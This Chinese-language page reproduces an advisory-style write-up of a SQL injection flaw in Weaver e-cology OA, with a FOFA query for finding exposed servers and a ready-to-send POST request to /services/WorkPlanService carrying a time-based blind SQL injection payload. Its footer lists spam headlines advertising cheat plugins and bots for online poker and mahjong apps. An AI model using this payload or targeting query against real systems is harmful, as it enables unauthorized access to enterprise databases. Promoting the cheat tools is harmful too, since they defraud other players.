漏洞复现-F6-11泛微-E-Cology-SQL
创始人
2024-11-22 04:05:23
0

本文来自无问社区,更多漏洞信息可前往查看icon-default.png?t=N7T8http://www.wwlib.cn/index.php/artread/artid/15575.html

0x01 产品简介

泛微协同管理应用平台e-cology是一套企业级大型协同管理平台

0x02 漏洞概述

该漏洞是由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现 SQL 注入漏洞。

影响范围:泛微E-Cology9 < 10.65.0

0x03 复现环境

FOFO:app="泛微-OA(e-cology)"

POC

延时5秒
payload:

POST /services/WorkPlanService HTTP/1.1 HOST:  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Content-Type: text/xml;charset=UTF-8 Connection: close                                          (SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)                    22

效果图:
 

图片

上一篇:苹果8为什么字拉不上去

下一篇:常州网站推广_网站推广(SEO设置)

相关内容

热门资讯

透视数据!德州机器人代打脚本(... 透视数据!德州机器人代打脚本(透视)底牌透视挂辅助挂(可靠开挂辅助德州论坛)-哔哩哔哩;德州机器人代...
透视插件!wpk模拟器多开(透... 透视插件!wpk模拟器多开(透视)底牌透视挂辅助工具(可靠开挂辅助插件教程)-哔哩哔哩;1、透视插件...
透视玄学!hhpoker一直输... 透视玄学!hhpoker一直输有挂(透视)底牌透视挂辅助脚本(可靠开挂辅助德州教程)-哔哩哔哩是一款...
透视新版!德州局透视脚本(透视... 透视新版!德州局透视脚本(透视)底牌透视挂辅助app(可靠开挂辅助可靠教程)-哔哩哔哩;致您一封信;...
透视玄学!hhpoker辅助器... 透视玄学!hhpoker辅助器,情怀宜春辅助挂定制交易平台,辅助教程(有挂详细)-哔哩哔哩1、这是跨...
第一分钟了解!宜兴红心自由麻将... 第一分钟了解!宜兴红心自由麻将有挂(辅助挂)原来有挂(专业辅助普及教程)-哔哩哔哩;相信小伙伴都知道...
透视有挂!wepoker开辅助... 透视有挂!wepoker开辅助能查到(透视)底牌透视挂辅助挂(可靠开挂辅助2025新版教程)-哔哩哔...
第4分钟了解!微乐挖坑有挂(辅... 第4分钟了解!微乐挖坑有挂(辅助挂)原本真的有挂(专业辅助2025新版技巧)-哔哩哔哩是一款可以让一...
辅助透视!竞技联盟辅助插件,广... 辅助透视!竞技联盟辅助插件,广东雀神智能插件安装免费,技巧教程(有挂解惑)-哔哩哔哩1、超多福利:超...
透视辅助!wepoker代打辅... 透视辅助!wepoker代打辅助机器人(透视)底牌透视挂辅助挂(可靠开挂辅助安装教程)-哔哩哔哩;1...